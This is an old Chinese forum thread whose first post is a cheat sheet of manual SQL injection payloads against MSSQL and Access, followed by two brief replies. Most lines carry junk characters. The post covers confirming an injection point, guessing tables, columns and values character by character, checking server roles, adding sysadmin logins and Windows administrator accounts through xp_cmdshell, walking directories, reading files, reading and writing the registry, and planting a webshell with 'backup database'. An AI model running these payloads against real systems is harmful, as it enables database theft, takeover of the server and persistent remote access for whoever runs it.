社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3803阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 ~< %%n'xmm  
  2.初步判断是否是mssql ;and user>0 wSoIU,I  
J'c]':U  
  3.注入参数是字符'and [查询条件] and ''=' u6^cLQO+  
jp=z ^l  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' F]]1>w*/0  
xUl=N   
  5.判断数据库系统 ?WPuTPw{  
EH{m~x[Ei  
  ;and (select count(*) from sysobjects)>0 mssql ~L\KMB/9e=  
#M kXio; h  
  ;and (select count(*) from msysobjects)>0 access -X+G_rY  
%(lr.9.]H  
R-8>,  
B].V|8h  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 nmI os]B  
buV {O[  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 pQv`fr=  
]DVZeI03@  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 Qj;wk lq  
K|JpkEw  
  9.(1)猜字段的ascii值(access) U-~cVk+LI  
52Sq;X  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 N$>.V7H&  
$yxwB/O(  
  (2)猜字段的ascii值(mssql) 3 RB+  
.j"iJ/  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 /+^7lQo\]  
/}+VH_N1  
  10.测试权限结构(mssql) \Ps}1)wT  
~[n]la  
kaM=Fk=t  
zq]I"0Bi.  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- [7x,&  
}AfX0[!O  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- 2ZTz{|y  
A^lJlr:_`  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- #B_Em$  
Y dgDMd-1  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- NT(gXEZ  
r.-U=ql  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- UXs=7H".  
v67utISNI  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- @:2<cn`  
op!ft/Yyb  
  ;and 1=(select IS_MEMBER('db_owner'));-- :vsBobiJ  
F7o#KN*.]  
1#nR$  
o 8fB  
  11.添加mssql和系统的帐户 XFj\H(D  
 3)D'Yx  
  ;exec master.dbo.sp_addlogin username;-- W^(:\IvV  
  ;exec master.dbo.sp_password null,username,password;-- FE'|wf  
.>X 0 $#  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- @^q|C&j  
;i;2cq  
  ;exec master.dbo.xp_cmdshell 'net user username password YgiLfz iT  
&\n<pXQ  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- tr[(,kX  
mBAI";L3  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- aL)}S%5o?  
,Z3 (`ftC  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- B7'rbc'  
f{i~hVF  
2Ra}&ie  
5Q/&,NP  
  12.(1)遍历目录 !UzMuGj  
8%+F.r  
  ;create table dirs(paths varchar(100), id int) Wi;wu*  
)Bz2-|\  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' /5**2Kgv1  
J&hzr t  
  ;and (select top 1 paths from dirs)>0 a9f!f %9  
M53{e;.kN  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) w(,K  
'R-Ly^:Qd  
UrC>n  
1\t#*N  
  (2)遍历目录 iY~.U`b`  
NA :_yA"  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- /m"#uC!\  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ~]w|ULNa3|  
_ ^2\/@  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 # dA-dN  
o$4i{BL  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 " Y1]6 Zu  
cr wui8  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 sY- ] Q  
T"bH{|:%*=  
:m&cm%W]ts  
fen~k#|l  
  13.mssql中的存储过程  AhyV  
UnE[FYx  
  xp_regenumvalues 注册表根键, 子键 |>'.(  
13JZ\`ceb  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $ [t7&e  
{s{ bnU  
  xp_regread 根键,子键,键值名 q HU}EEv  
B2kKEMdGg  
  ;exec xp_regread vC [uEx:  
 S6d&w6  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 qOqU CRUe:  
Xn%ty@8  
  xp_regwrite 根键,子键, 值名, 值类型, 值 H{d;, KfX  
vvi[+$M  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @$*LU:[  
&s{" Vc9]  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 yIq. m=  
 %"jp':  
  xp_regdeletevalue 根键,子键,值名 [X&VxTxr  
Lu][0+-  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 swTur  
,N1I\f  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 /0_^Z2  
cWU9mzsE  
*+UgrsRk  
5R%4fzr&g  
  14.mssql的backup创建webshell A &tMj?  
G u4mP  
  use model n OQvBc  
m>:zwz< ;  
  create table cmd(str image); SDbR(oV  
Ovhd%qV;Y  
  insert into cmd(str) values (''); ]ZI ?U<0  
^o8o  
  backup database model to disk='c:\l.asp'; e[($rsx  
*NjjFk=R  
CG0jZB#u  
r7zS4;b  
  15.mssql内置函数 9 *+X ^q'  
~lQ<#*wl  
  ;and (select @@version)>0 获得Windows的版本号 a W9_[#z5  
>D5WAQ>b  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa K;'s+ZD  
,7/F?!G!J  
  ;and (select user_name())>0 爆当前系统的连接用户 -}G>{5.A  
X4$86  
  ;and (select db_name())>0 得到当前连接的数据库 5*hA6Ex7  
S2\|bs7;J,  
U{Xx)l/o  
= lMs1}S9  
  16.简洁的webshell it)!-[:bm  
Tya[6b!8  
  use model 50R&;+b  
JW2~ G!@  
  create table cmd(str image); $v\o14 v  
p 02E:?  
  insert into cmd(str) values (''); hhr!FQ.+/  
2_C&p6VGj  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
欢迎提供真实交流,考虑发帖者的感受
认证码:
验证问题:
10+5=?,请输入中文答案:十五